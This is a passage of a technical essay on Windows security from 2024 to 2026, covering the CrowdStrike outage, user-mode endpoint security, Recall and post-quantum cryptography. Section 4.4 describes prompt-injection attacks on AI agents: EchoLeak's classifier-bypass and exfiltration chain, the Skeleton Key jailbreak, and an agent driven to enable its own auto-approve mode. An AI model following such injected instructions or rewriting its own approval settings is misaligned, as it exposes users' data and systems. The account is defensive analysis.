CrowdStrike's term for the Rapid Response Content delivery unit -- a data file interpreted at runtime by the in-kernel Content Interpreter inside the Falcon sensor. Channel files are not driver binaries and do not go through KMCS; they configure the behavior of a driver that is already loaded [@crowdstrike-rca-pdf]. sequenceDiagram participant Cloud as CrowdStrike cloud participant Sensor as Falcon sensor (csagent.sys) participant CI as In-kernel Content Interpreter participant Kernel as NT kernel Cloud->>Sensor: Push Channel File 291 (IPC Template Instance) Sensor->>CI: Load 21 input parameters Note over CI: Expected 20 parameters, got 21 CI->>CI: Index past array bound CI->>Kernel: OOB read at csagent+0xe14ed Kernel->>Kernel: nt!KiPageFault+0x369 Kernel->>Sensor: BSOD across 8.5M hosts

The scale was unambiguous. David Weston's July 20, 2024 post put the number at "8.5 million Windows devices, or less than one percent of all Windows machines," and noted that the "broad economic and societal impacts reflect the use of CrowdStrike by enterprises that run many critical services" [@ms-weston-jul20-2024]. Delta Air Lines cancelled approximately 7,000 flights between July 19 and July 25 -- a figure the carrier's May 2025 lawsuit filings and contemporaneous reporting both anchor to [@wiki-crowdstrike-outage]. Parametrix estimated the direct losses to US Fortune 500 companies alone at roughly 5.4 billion dollars [@cso-hints-kernel].

Microsoft's response over the next nineteen months was a paced institutional walk away from the 2006-2009 settlement, framed publicly as resilience rather than retreat. On September 10, 2024, Microsoft hosted the Windows Endpoint Security Summit at Redmond with eight MVI vendors in attendance [@ms-securityweek-wesp]. David Weston's September 12, 2024 post captured the framing: "endpoint security vendors and government officials from the U.S. and Europe... strategies for improving resiliency and protecting our mutual customers' critical infrastructure" [@weston-sept12-2024-wess]. On November 19, 2024 at Ignite, Microsoft publicly named the Windows Resiliency Initiative [@thehackernews-crowdstrike-rca] [@ms-securityweek-wesp].

On June 26, 2025, the Windows Experience blog made the load-bearing commitment that re-opened the kernel-residency question: "Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners. The new Windows capabilities will allow them to start building their solutions to run outside the Windows kernel. This means security products like anti-virus and endpoint protection solutions can run in user mode just as apps do" [@wri-jun26-2025]. The private preview opened in July 2025 to Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure [@ms-securityweek-wesp] [@heise-resilient-windows].

The Windows-supplied user-mode API surface for endpoint security vendors announced at Microsoft Build 2025 and opened to MVI 3.0 partners in private preview in July 2025 [@wri-jun26-2025]. WESP separates kernel-resident event collection (owned by Windows) from vendor-owned policy evaluation (run in a tamper-protected user-mode service). It is the architectural answer to the failure mode CrowdStrike demonstrated -- a vendor data-parsing bug can no longer take the kernel down with it.

In parallel, Microsoft began closing the legacy escape hatch. On March 26, 2026, Microsoft IT Pro group program manager Peter Waxman posted "Advancing Windows driver security: Removing trust for the cross-signed driver program," announcing that the April 14, 2026 Windows security update would remove trust for the cross-signed driver program in evaluation mode on Windows 11 24H2, 25H2, 26H1, and Server 2025 [@techcommunity-cross-signing]. The April 14, 2026 driver-protection KB followed, blocking the psmounterex.sys family as the first named exemplar [@april-2026-driver-kb]. Industry coverage framed the move as "closing a 20-year-old critical security hole" [@computerworld-cross-signing] [@techpowerup-cross-signing] [@cybersecuritynews-cross-signing]; the Custom Kernel Signers feature in Application Control for Business is the escape hatch Microsoft preserved for organizations that legitimately need to sign internal kernel drivers, with the Windows Hardware Compatibility Program as the canonical path [@custom-kernel-signers].

The legacy KMCS trust path, introduced in the early 2000s, that let third-party certificate authorities issue Windows-trusted code-signing certificates for kernel drivers. Because developers managed their own private keys, the program became a frequent target for credential theft and rootkit deployment [@cybersecuritynews-cross-signing]. The April 14, 2026 Windows update removes trust for cross-signed drivers in evaluation mode, leaving WHCP as the canonical submission path.

Note: Microsoft has not publicly committed to a hard "AV kernel-driver ban" date. The April 2026 update is a driver-loading-policy change with a Code Integrity-anchored evaluation window (100 runtime hours plus 2 or 3 restarts before policy activates) [@techcommunity-cross-signing], not a categorical AV kernel-driver eviction. WHCP-certified kernel drivers continue to load. Conflating WESP with the Cross-Signing trust deprecation is a recurring citation-audit failure: they are separate primitives that are part of the same multi-year transition.

If the OS layer kept hardening while the layer above became the soft spot, the AI agent layer is the youngest version of the same pattern -- and the era is producing its first CVE-grade exemplars in real time.

4.4 AI threat-model arrivals

The fourth thread is the youngest. By mid-2024 the agentic-AI persistence catalog was beginning to populate in the CVE database, and Microsoft, Apple, Google, and Anthropic were converging on a structural admission: no existing operating-system primitive knows how to enforce policy on an AI agent's judgment.

The substrate arrived in pieces. May 20, 2024 brought the Copilot+ PC announcement and the NPU as a programmable local surface [@copilot-pcs-may-20]. June 10, 2024 brought Apple's Private Cloud Compute design paper, whose five core requirements -- stateless computation, enforceable guarantees, no privileged runtime access, non-targetability, and verifiable transparency -- now anchor every "what would attested AI infrastructure look like" conversation in the industry [@apple-pcc]. June 26, 2024 brought Microsoft's first public write-up of a multi-turn jailbreak class -- Skeleton Key, originally demonstrated by Mark Russinovich at Microsoft Build 2024Russinovich's stage demo called the technique "Master Key"; the MSRC blog renamed it "Skeleton Key" for public disclosure on June 26, 2024 [@ms-skeleton-key]. -- and the corresponding Prompt Shields mitigation in Azure AI Content Safety [@ms-skeleton-key] [@jailbreak-detection-shields]. August 8, 2024 brought Michael Bargury's Black Hat USA sessions "15 Ways to Break Your Copilot" and "Living off Microsoft Copilot," where Bargury demonstrated SharePoint-RAG-grounded exfiltration chains and the LOLCopilot tool that used a victim's own Copilot to write spear-phishing email in the victim's writing style [@mbgsec-bargury-pdf] [@thurrott-bargury] [@theregister-bargury].

The CVE catalog populated through 2025-2026. The single most consequential entry is EchoLeak (CVE-2025-32711) -- a single-email, zero-click data-exfiltration chain against Microsoft 365 Copilot disclosed by Aim Labs in June 2025 [@aim-labs-echoleak] [@nvd-cve-32711]. SecurityWeek's reporting captures the structural achievement: "In order to execute an EchoLeak attack, the attacker has to bypass several security mechanisms, including cross-prompt injection attack (XPIA) classifiers" [@securityweek-echoleak]. Sentra's reconstruction enumerates the four bypasses: the XPIA classifier was evaded by phrasing the malicious instructions as if addressed to the human recipient; Copilot's link-redaction was circumvented with reference-style Markdown; the email client's automatic image pre-fetch was used to trigger an exfiltration request; and Microsoft Teams' asynchronous preview API -- an allowed domain under Copilot's Content Security Policy -- was used to proxy the exfiltrated data to the attacker [@sentra-echoleak]. Microsoft classified the vulnerability "critical" with CVSS 9.3 and patched it server-side with no customer action required [@checkmarx-echoleak] [@securityweek-echoleak].

flowchart TD A["Attacker email lands in user inbox"] --> B["XPIA classifier bypass via direct-to-user phrasing"] B --> C["RAG retrieval pulls email into Copilot context"] C --> D["Markdown reference-style link bypass of redaction"] D --> E["Automatic image pre-fetch triggers exfiltration request"] E --> F["Teams preview API as allowed CSP domain proxies data"] F --> G["Attacker receives sensitive M365 content"] Per OWASP LLM01, the class of attacks in which adversary-controlled text fed into a large language model causes the model to take an action the system designer did not intend [@owasp-llm-top10]. Indirect prompt injection is the subclass in which the malicious text reaches the model through retrieved context (RAG, web fetch, email body) rather than the user's prompt directly. EchoLeak is the canonical indirect-prompt-injection chain against an LLM-application-layer agent.

The catalog around EchoLeak is now substantial. PromptJacking is Koi Security's collective name for three Anthropic Claude Desktop extension RCE vulnerabilities (Chrome, iMessage, and Apple Notes connectors) -- AppleScript injection from a maliciously crafted URL, rated CVSS 8.9 by Anthropic, fixed in version 0.1.9 in September 2025 [@koi-promptjacking] [@infosec-magazine-promptjacking]. ShadowPrompt, disclosed by Koi Security on March 26, 2026, chained a wildcard origin allowlist (*.claude.ai) in the Claude Chrome extension with a DOM-based XSS in an Arkose Labs CAPTCHA hosted on a-cdn.claude.ai to let any website silently inject prompts; the extension had over 3 million users at the time of disclosure [@koi-shadowprompt]. CVE-2025-53773 -- "ZombAIs" -- is a GitHub Copilot RCE via prompt-injection-controlled writes to .vscode/settings.json that enable chat.tools.autoApprove ("YOLO mode") and grant the agent unrestricted shell access [@nvd-cve-53773] [@cybersecuritynews-copilot-rce].

CVE or named class	Affected agent	Structural bound exploited	Mitigation status
EchoLeak (CVE-2025-32711) [@nvd-cve-32711]	Microsoft 365 Copilot	LLM Scope Violation -- agent treats retrieved context as trusted	Server-side patch June 2025 [@securityweek-echoleak]
PromptJacking (CVSS 8.9) [@koi-promptjacking]	Claude Desktop extensions	Unsanitized AppleScript template interpolation	Fixed in version 0.1.9 [@infosec-magazine-promptjacking]
ShadowPrompt [@koi-shadowprompt]	Claude Chrome extension	Wildcard origin allowlist plus third-party CAPTCHA XSS	Origin checks tightened in 1.0.41
CVE-2025-53773 (ZombAIs) [@nvd-cve-53773]	GitHub Copilot agent	Agent writes own configuration; YOLO-mode toggle	Patched [@cybersecuritynews-copilot-rce]
Skeleton Key / Master Key [@ms-skeleton-key]	Azure-managed LLMs	Multi-turn safety-policy override	Prompt Shields mitigation [@jailbreak-detection-shields]
Living off Microsoft Copilot [@mbgsec-bargury-pdf]	Microsoft 365 Copilot tenant	RAG-grounded post-compromise abuse	Phillip Misner: "similar to other post-compromise techniques" [@thurrott-bargury]

Aim Labs coined the phrase "LLM Scope Violation" for the EchoLeak chain. The vocabulary matters: the bug is not that the model failed a safety filter; it is that the model treated retrieved content as instruction. Anthropic's mid-2025 research note frames the structural caveat in similar terms: "prompt injection is far from a solved problem, particularly as models take more real-world actions... every webpage an agent visits is a potential vector for attack" [@anthropic-prompt-injection].

The taxonomies these CVEs are graded against are themselves new. OWASP published its Top 10 for Large Language Model Applications in 2023 and refreshed it in 2025 [@owasp-llm-top10]; NIST released the AI Risk Management Framework in January 2023 and the GenAI-specific Profile (AI 600-1) in July 2024 [@nist-ai-rmf] [@nist-ai-600-1]. Both treat prompt injection as a first-class class. Neither is a normative standard the way RFC 8725 is for JWTs.

Note: The structural bound EchoLeak demonstrates is general: any LLM agent that reads adversary-controllable text and can take an action -- write, send, fetch, execute -- has the structural template. Composition (cage plus input filter plus output filter) reduces blast radius; it does not eliminate the class.

If the AI agent's judgment is now a trust principal, the defensive arrivals across the era are the OS-layer hardening that the layer-above-the-OS soft spots are contrasted against. The next subsection inventories them so the state-of-the-art section can evaluate the whole stack.

4.5 Defensive arrivals across the era

The fifth thread runs underneath the other four. While the layer above the OS was failing publicly, the OS layer itself kept hardening -- across hardware roots of trust, on-device confidentiality, identity-side enforcement, and the cryptographic substrate.

Pluton expanded. The November 2020 Microsoft-AMD-Intel-Qualcomm joint announcement is the prior context, AMD Ryzen 6000 in 2022 was the first PC-class shipment, and Intel Core Ultra Series 2 (Lunar Lake, GA September 24, 2024) brought Pluton-as-Partner-Security-Engine to mainstream Intel mobile silicon [@pluton-docs]. Microsoft moved Pluton firmware servicing to the OS update channel, decoupling security-critical TPM-and-RoT updates from OEM BIOS-release cadences. Personal Data Encryption -- the per-user, per-file successor to EFS that uses Windows Hello to derive the file-encryption key -- shipped as a default-on option on Windows 11 24H2. Continuous Access Evaluation became the default revocation primitive for Microsoft 365 services, providing roughly 3-minute token-revocation latency in place of the prior cache-bound model [@cae-docs] [@openid-sse].

The cryptographic substrate finalized. On August 13, 2024, NIST published FIPS 203 (ML-KEM, the Module-Lattice-Based Key Encapsulation Mechanism standard) [@fips-203], FIPS 204 (ML-DSA, the Module-Lattice-Based Digital Signature standard) [@fips-204], and FIPS 205 (SLH-DSA, the Stateless Hash-Based Digital Signature standard) [@fips-205], with the Federal Register notice following on August 14, 2024 [@federal-register-pq].

The three NIST-standardized post-quantum primitives finalized August 13, 2024. ML-KEM (FIPS 203) is the lattice-based key encapsulation mechanism; ML-DSA (FIPS 204) is the lattice-based digital signature standard; SLH-DSA (FIPS 205) is the hash-based signature standard that hedges against future lattice-attack discoveries [@fips-203] [@fips-204] [@fips-205]. NIST chose three families precisely because no single family has both the security-margin and the performance properties needed for every Windows surface.

Microsoft's SymCrypt cryptographic library shipped ML-KEM and ML-DSA implementations; SChannel began previewing TLS 1.3 with ML-KEM hybrid key exchange; DPAPI-NG envelope-key migration to ML-KEM is in research; Kerberos post-quantum migration is named in the SFI April 2025 progress report as a multi-year program [@sfi-apr-2025]. The eight Windows AI updates published in coordination on April 25, 2025 captured the parallel: responsible AI commitments, Phi Silica multimodal, and Copilot+ PC AI features shipped together as a single coordinated public moment [@blogs-windows-apr25-2025].

FIPS 206 -- the FN-DSA standard derived from FALCON -- remains in draft as of May 2026; the URL csrc.nist.gov/pubs/fips/206/ipd returns HTTP 404 because NIST has not published an Initial Public Draft. Anyone needing a current status should look at the NIST Post-Quantum Cryptography project page rather than the per-FIPS page.

The defensive arrivals are real and substantial. They do not change the article's thesis -- they harden the OS layer (Pluton, VBS, PDE, Driver Block List) and the cryptographic substrate (PQC). The thesis is about what happens above the OS layer.

Five threads. One inflection. The question the next section must answer: what architectural insight ties them together?

5. The Insight

Three insights define the era. The article's thesis is the first; the other two are the context that makes the first ring true. All three must be named because the era's actual insight is that all three are true simultaneously and reinforce each other.

The third-party kernel privilege insight

The first insight is the article's thesis. The CrowdStrike outage refuted the 2006-2009 EU-engagement assumption that AV and EDR vendors needed kernel access to be effective by demonstrating a failure mode the argument did not address: a non-malicious data-parsing bug inside a privileged third-party kernel driver, no attacker involved, 8.5 million hosts offline, roughly 5.4 billion dollars in Parametrix-estimated direct losses to US Fortune 500 [@ms-weston-jul20-2024] [@cso-hints-kernel] [@crowdstrike-rca-pdf]. The Windows Endpoint Security Platform is the architectural answer: a sanctioned user-mode EDR API surface (tamper-protected, performance-equivalent target, MVI-3.0-gated) co-engineered with the major AV vendors [@wri-jun26-2025]. The April 14, 2026 Cross-Signing Program trust deprecation closes the legacy escape hatch [@techcommunity-cross-signing]. Together, they are a quiet admission that the 25-year settlement was a compromise the era's evidence has now made unsustainable.

flowchart TD subgraph Kernel ["Kernel (OS-owned)"] K1["ETW providers"] --> K2["Event broker"] K3["Process and file telemetry"] --> K2 end K2 --> U1["Tamper-protected user-mode service"] subgraph User ["User mode (vendor-owned)"] U1 --> U2["Vendor detection logic"] U2 --> U3["Vendor action API call"] end U3 --> Kernel L["Vendor channel-file or model update"] --> U2

The institution-is-the-boundary insight

The second insight is what Storm-0558 plus the CSRB verdict prove together: the vendor's internal security culture is part of the platform's attack surface for every downstream customer. The unrotated 2016 MSA signing key was not a bug; it was a decision (or a default) made inside Microsoft about how long signing keys lived and how they were stored. The missing OWA issuer-validation check was not a bug; it was an architectural assumption developers made about which libraries handled which validation steps. The Secure Future Initiative is the first time a platform vendor has publicly bet executive compensation and the cross-progress-report engineering commitments enumerated in §4.1 on this insight at the corporate level [@sfi-sept-2024] [@sfi-apr-2025] [@sfi-nov-2025-windows].

The AI agent is a new trust principal insight

The third insight is what the Recall saga is the first widely public worked example of. An AI feature whose threat model is not covered by AppContainer, VBS, TPM, or DPAPI alone forced Microsoft to invent a new pattern: VBS Enclave plus Windows Hello ESS gating plus TPM-rooted device key plus in-enclave content filtering, with explicit acknowledgement that the UI plane that decrypts content for display is, by Microsoft's own Security Servicing Criteria, not a security boundary [@recall-davuluri-sept27-2024] [@msrc-servicing-criteria] [@hello-ess-docs] [@vbs-enclaves-docs]. The April 2026 TotalRecall Reloaded disclosure proves the boundary holds at the vault and breaks at the delivery truck, exactly as the September 2024 design predicted it would [@itnews-totalrecall-reloaded]. The agentic-AI CVE catalog -- EchoLeak, PromptJacking, ShadowPrompt, ZombAIs -- shows the broader version of the same pattern: existing primitives can sandbox the agent's process and protect its data; none of them knows how to enforce policy on the agent's decisions.

Key idea: The three insights are not separable. The institutional failure (Storm-0558), the kernel-architectural failure (CrowdStrike), and the AI-trust-model failure (Recall and the EchoLeak class) are one architectural inflection seen from three angles: the layer above the OS has become the soft layer, and the OS-layer primitives Microsoft spent 25 years building do not extend upward into it. WESP, SFI, and the Recall Generation-3 architecture are Microsoft's first sustained engineering re-architecture of all three soft spots in parallel.

The thesis foregrounds the third-party kernel privilege insight because CrowdStrike is the single most measurable evidence -- the §4.3 numbers above, plus the Delta cancellations and the April 14, 2026 Cross-Signing trust deprecation. The other two are the context that explains why the layer above the OS is now the soft layer in multiple different ways.

If those three insights are right, what does the actual production deployment picture look like in May 2026? Six surfaces. The next section walks each one.

6. State of the Art, May 2026

May 2026 is the first calendar window in which all three soft-layer responses are simultaneously visible in production deployment, sanctioned private preview, or public roadmap. Six surfaces have to be evaluated together.

Identity. MSA and Entra ID signing keys live in hardware-backed security modules with automatic rotation [@azure-managed-hsm]; the MSA signing service runs in Azure Confidential VMs and Entra ID signing service migration is in progress [@sfi-apr-2025] [@azure-confidential-vm]. Microsoft's April 2025 progress report states that 90% of Entra ID tokens for Microsoft's own apps validate through the hardened identity SDK [@sfi-apr-2025]. Continuous Access Evaluation is the default revocation primitive for Microsoft 365 [@cae-docs]. Kerberos and SChannel post-quantum migration roadmaps are public; ML-DSA code-signing is in research.

Endpoint. Windows 11 24H2 RTM'd on October 1, 2024 for broad SKUs (Copilot+ PCs reached the same RTM on June 18, 2024, without Recall) [@copilot-pcs-may-20]. Windows 11 25H2 is in market. Windows 10 went end-of-life on October 14, 2025 [@ms-windows10-lifecycle]. Smart App Control ships default-on for new installs; Personal Data Encryption is generally available; Application Security Reduction rules cover AI-feature exclusions; Recall is GA on Snapdragon, AMD, and Intel Copilot+ silicon [@recall-manage-docs].

Antivirus and EDR. The Windows Endpoint Security Platform is in MVI 3.0 private preview as of July 2025 with Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure participating [@ms-securityweek-wesp] [@wri-jun26-2025]. Defender is already user-mode-capable. The April 14, 2026 Windows security update has begun the Cross-Signing Program trust deprecation in evaluation mode with the 100-runtime-hour and 2-or-3-restart criteria; WHCP-only enforcement is opt-in [@techcommunity-cross-signing] [@april-2026-driver-kb].

On-device AI. Recall Generation-3 is the worked example of the VBS Enclave plus TPM-rooted plus Windows Hello ESS gating pattern [@recall-davuluri-sept27-2024]. Copilot Vision and the on-device agent surface inherit the same template. Azure AI Content Safety Prompt Shields are the input-filter substrate for prompt-injection mitigation [@jailbreak-detection-shields]. OWASP LLM Top 10 [@owasp-llm-top10] and NIST AI RMF [@nist-ai-rmf] [@nist-ai-600-1] are the threat-class taxonomies.

Hardware. Pluton is across all three major x86 vendors plus Snapdragon: AMD Ryzen 6000+; Intel Core Ultra Series 2 and Series 3 with Partner Security Engine; Qualcomm Snapdragon 8cx Gen 3 and X Series [@pluton-docs]. Pluton firmware on 2024+ AMD and Intel ships through the OS update servicing channel. Per the November 2025 SFI report, Surface UEFI firmware and Windows drivers are being rewritten in Rust [@sfi-nov-2025-windows].

Cryptography. SymCrypt-OpenSSL ships with ML-KEM and ML-DSA. TLS 1.3 with ML-KEM hybrid key exchange is in SChannel preview. DPAPI-NG envelope-key migration to ML-KEM is in research [@sfi-apr-2025] [@fips-203] [@fips-204].

Cross-platform comparison

The state of the art is plural. Apple has shipped a user-mode Endpoint Security Framework since macOS 10.15 in October 2019 [@apple-esf-docs]; the Windows transition is catching up to an existing platform precedent rather than inventing the architecture. For cloud-attested AI confidentiality, Apple Private Cloud Compute is the published reference design [@apple-pcc]. For kernel-resident EDR with constrained programmability, the Linux eBPF route -- Falco and Tetragon -- is a credible third option [@falco-docs] [@tetragon-docs]. Microsoft maintains an eBPF for Windows project that targets networking-class use cases, not EDR-class collection, so eBPF is not a third Windows option as of May 2026 [@ms-ebpf-for-windows].

Surface	Microsoft 2026 position	Apple peer	Linux peer	Status
Identity-token custody	Managed HSM + Confidential VMs [@azure-managed-hsm]	iCloud Keychain, ADP	AWS CloudHSM [@aws-cloud-hsm]	Live, post-Storm-0558
EDR architecture	WESP user-mode, MVI 3.0 private preview [@wri-jun26-2025]	ESF, GA since macOS 10.15 [@apple-esf-docs]	eBPF: Falco, Tetragon [@falco-docs] [@tetragon-docs]	Private preview
On-device AI confidentiality	Recall: VBS Enclave + TPM + Hello ESS [@recall-davuluri-sept27-2024]	On-device Apple Intelligence	None equivalent	GA May 2025
Cloud-attested AI	M365 Copilot tenant boundary; Confidential Inferencing roadmap	Private Cloud Compute [@apple-pcc]	None equivalent	Apple ahead
Hardware RoT	Pluton (AMD, Intel, Qualcomm) [@pluton-docs]	Secure Enclave Processor	Various (Google Titan, AWS Nitro)	Pluton ahead on PC
Post-quantum	SymCrypt ML-KEM, ML-DSA; TLS preview [@fips-203] [@fips-204]	CryptoKit ML-KEM, iMessage PQ3	Liboqs, OpenSSL providers	Industry parity

Falco's ADOPTERS.md lists Booz Allen Hamilton, Frame.io, GitLab, MathWorks, Secureworks, Skyscanner, Sumo Logic, and Shopify as production adopters as of May 2026 [@falco-adopters]. Earlier write-ups frequently named Google, Netflix, and Pinterest; that list is incorrect against the current file.

Microsoft's distinctive bet is the institution-plus-kernel-architecture-plus-AI-trust-model triple. No peer matches at all three layers simultaneously. Apple has the cleanest user-mode EDR story and the cleanest cloud-attested AI story; it does not have a public equivalent to SFI's institutional commitments at the corporate-governance level. Linux has the most flexible kernel-residency-with-constrained-programmability story for EDR; it has no equivalent to the Recall-style on-device AI feature plane because no Linux desktop ships such a feature at scale.

The state of the art is plural. Three real and live disagreements remain unresolved as of May 2026, and they sit at the heart of where the field goes next.

7. Competing Approaches

Three real and live disagreements as of May 2026. The article's thesis takes a position on the first; the other two are honestly named as open.

Inside the kernel or outside

The first disagreement sits at the heart of the article's thesis. Microsoft and Apple converge on outside-the-kernel as the strategic answer -- WESP on the Windows side [@wri-jun26-2025], the Endpoint Security Framework on the macOS side, generally available since October 2019 [@apple-esf-docs]. Linux's eBPF-based EDR architectures are a third option that combines kernel-residency with constrained programmability -- the eBPF verifier rejects programs that can crash the kernel before they load [@falco-docs] [@tetragon-docs]. CrowdStrike, SentinelOne, and Sophos all have public commitments to the WESP user-mode path while continuing to ship kernel components during the transition [@ms-securityweek-wesp].

The trade-offs are honest. In-kernel sees more, runs faster on the hot paths, and can intervene at lower latency. User-mode cannot crash the OS, can be sandboxed, and trades blast radius for visibility. eBPF tries to take both: kernel-residency speed plus a static verifier that bounds what the program can do.

Architecture	Visibility	Blast radius	Latency	Attestation	Deployment status
Legacy in-kernel third-party	Highest	Whole OS BSOD risk (CrowdStrike-class)	Lowest	KMCS + WHCP	Default through April 2026; cross-signing trust deprecated [@techcommunity-cross-signing]
WESP user-mode (Windows)	High via OS-provided ETW + brokers [@wri-jun26-2025]	User-mode service restart	Higher than kernel-mode	OS-attested user-mode service	MVI 3.0 private preview [@ms-securityweek-wesp]
Apple ESF (macOS)	High via system extensions [@apple-esf-docs]	User-mode extension only	Higher than kernel-mode	macOS notarization	GA since 10.15
eBPF (Linux: Falco, Tetragon) [@falco-docs] [@tetragon-docs]	High; in-kernel programs	Verifier-bounded; cannot crash kernel	Near kernel-mode	None standardized	Production at Booz Allen, GitLab, MathWorks [@falco-adopters]

The article's thesis takes the position that the CrowdStrike proof case has settled the trade-off in favor of out-of-kernel for the general AV and EDR class. The lingering question is whether eBPF-style constrained programmability is a viable third option in the Windows lineage. Microsoft's eBPF for Windows repository targets networking, not EDR collection [@ms-ebpf-for-windows]; nothing in the public roadmap suggests that changes before Part 7.

Hardware-rooted on-device or cloud-attested

The second disagreement sits at the boundary of confidential computing and AI inference. Apple's Private Cloud Compute bets that the heavy AI inference belongs in attested confidential-VM cloud nodes -- five core requirements (stateless computation, enforceable guarantees, no privileged runtime access, non-targetability, verifiable transparency) [@apple-pcc]. Microsoft (Recall, Copilot+ on-device inference) and Google bet on hardware-rooted on-device enclaves; the Recall Generation-3 architecture is the worked Windows example [@recall-davuluri-sept27-2024]. The trade-offs are latency, privacy-by-non-transmission, the hardware-attestation surface, and the harder question of what happens when the model itself becomes sensitive intellectual property the device must protect from the device's own owner.

Whether the AI trust boundary can be formalized at all

The third disagreement is the hardest. Anthropic's published prompt-injection research note acknowledges directly that prompt injection is "far from a solved problem" and that "every webpage an agent visits is a potential vector for attack" [@anthropic-prompt-injection] [@anthropic-claude-chrome]. The structural question is whether the AI-agent-as-trust-principal model can be made architecturally safe at all, or whether the only durable answer is to keep the agent in a strict permission cage along the lines of the iOS App Sandbox model or Win32 App Isolation [@app-isolation]. The article must name this disagreement as live, not pretend it is resolved.

Microsoft's eBPF for Windows repository describes itself as a work in progress to bring existing eBPF toolchains and APIs from the Linux community to Windows [@ms-ebpf-for-windows]. As of May 2026 the project targets networking use cases. It is not yet a Windows-side answer to Falco or Tetragon.

Some bounds in the era are honest disagreements; others are mathematical. The next section walks the limits that cannot be argued away.

8. Theoretical Limits

Some of the era's bounds are not engineering deficits. They are mathematical, physical, or structural -- and naming them honestly is the only way to evaluate the era's architecture without sliding into apologist framing.

The Forshaw bound on Recall

James Forshaw's June 3, 2024 post named a bound that the April 2026 TotalRecall Reloaded disclosure confirmed empirically: any privilege escalation, or any non-security boundary, is sufficient to leak Recall's data because the user account that owns the data is also the principal that runs the AI feature that decrypts it [@forshaw-acl-jun3-2024]. The Generation-3 architecture pushes the key into a VBS Enclave bound to a TPM-released device key gated by Windows Hello ESS [@recall-davuluri-sept27-2024]; what it cannot do is hide the decrypted plaintext from the AI host process that has to render it. Microsoft's own Security Servicing Criteria treats same-user post-authentication as not a security boundary [@msrc-servicing-criteria]. TotalRecall Reloaded attacked exactly that delivery-truck process -- the AIXHost.exe renderer -- and Microsoft determined the technique "operates within the current, documented security design of Recall" [@itnews-totalrecall-reloaded]. The §4.2 vault-and-delivery-truck framing is the empirical anchor for the Forshaw bound's general form.

The trusted-insider-with-physical-access bound on hardware enclaves

No hardware-rooted on-device confidentiality survives the device-physically-compromised attacker over a long enough adversarial window. Pluton, Hello ESS, and VBS Enclaves all raise the cost of attack; they do not eliminate it. The architectural goal is to make the attack expensive enough that mass-scale attacks become uneconomical, not to prove that no attack exists.

The 4096-byte problem in post-quantum signatures

NIST standardized three post-quantum signature families precisely because no single family has both the security-margin and the performance properties needed for every Windows surface. ML-KEM (FIPS 203) is fast but lattice-only [@fips-203]. SLH-DSA (FIPS 205) is hash-based and hedges against future lattice attacks at the cost of signatures large enough to be impractical for many surfaces [@fips-205]. ML-DSA (FIPS 204) is the workhorse but inherits the lattice-attack-class uncertainty SLH-DSA is meant to hedge against [@fips-204].

The hardware bound is concrete. Per FIPS 204 final, ML-DSA-44 produces 2,420-byte signatures, ML-DSA-65 produces 3,309-byte signatures, and ML-DSA-87 produces 4,627-byte signatures [@fips-204-pdf] [@encryptionconsulting-fips204]. The TPM 2.0 Library Specification sets the default command and response buffer at 4,096 bytes (TPM2_MAX_COMMAND_SIZE and TPM2_MAX_RESPONSE_SIZE in the Implementation-Dependent Constants table) [@tcg-tpm2-spec] [@tpm2-tss-types]. The arithmetic is unforgiving: $$2{,}420 < 3{,}309 < 4{,}096 < 4{,}627$$ ML-DSA-44 and ML-DSA-65 fit in a default TPM 2.0 buffer; ML-DSA-87 does not. Any Windows surface that wants TPM-resident ML-DSA-87 signing has to either negotiate larger buffer sizes (vendor-specific) or settle for the smaller parameter set and accept a lower classical-security margin.

The previous iteration of this article reported ML-DSA byte sizes as 2,420 (correctly for ML-DSA-44 but mis-labeled for ML-DSA-65) and 4,595 (incorrectly for ML-DSA-87). The corrected sizes from FIPS 204 Appendix B and the EncryptionConsulting cross-attestation are 2,420 / 3,309 / 4,627 [@fips-204-pdf] [@encryptionconsulting-fips204]. The load-bearing inequality -- ML-DSA-65 fits, ML-DSA-87 does not -- survives the correction.

The AI-agent-judgment bound

No existing formal-verification framework knows how to prove safety properties about an AI agent's decision process. The boundary is, by construction, statistical -- and statistical security boundaries are a new thing in the Windows lineage. The composition Microsoft uses today (Win32 App Isolation as the cage [@app-isolation], Prompt Shields as the input filter [@jailbreak-detection-shields], Groundedness Detection and Task Adherence as the output filter, OS-attested enclaves where confidentiality matters) reduces blast radius. It does not eliminate the class. This is the era's defining open theoretical question.

The Rice's Theorem bound on driver validation

Even WESP cannot guarantee that no future user-mode EDR component will introduce a Channel-File-291-class failure. Rice's Theorem says that no general decision procedure exists for non-trivial semantic properties of arbitrary programs; the WESP architectural fix is blast-radius reduction (kernel-mode crash becomes user-mode service restart), not defect elimination. Naming this honestly avoids the apologist failure mode in which WESP gets framed as a solution rather than a mitigation.

Note: WESP changes the consequence of a vendor data-parsing bug from a kernel BSOD into a user-mode service restart. It does not prevent the bug. The right comparison is not "the bug never happens" but "when the bug happens, what is the blast radius." The CrowdStrike Channel File 291 defect in a WESP-architected world is a vendor process that exits and restarts -- the host stays up.

Some of these limits will be relaxed by future engineering; others will not. The next section asks which are live research and which are accepted physical bounds.

9. Open Problems

Where active research and engineering is happening as of May 2026 -- and where the thesis's open forward questions live.

Whether the user-mode EDR API surface is empirically sufficient for the AV and EDR class. WESP is in private preview as of May 2026 [@wri-jun26-2025]. Whether it can match in-kernel EDR for the BYOVD and rootkit attack class is not yet empirically settled. This is the load-bearing open question for the article's thesis. If WESP cannot deliver visibility-equivalent-to-kernel for the rootkit class, the third-party-AV-in-kernel model has not actually ended -- it has only been administratively constrained. The MVI 3.0 private preview cohort is the empirical test bed; the first public benchmark write-ups should arrive in 2026-2027.

Production deployment of post-quantum identity-token signing. Kerberos PKINIT, OAuth-token JWS, SAML XMLDSig -- Apple, Google, and Microsoft all have public roadmaps; none has shipped at production scale to consumer endpoints as of May 2026. Microsoft's SFI April 2025 progress report names Kerberos PQ migration as a multi-year program [@sfi-apr-2025]; the FIPS 203/204/205 finals from August 13, 2024 are the gating standards [@fips-203] [@fips-204] [@fips-205] [@federal-register-pq].

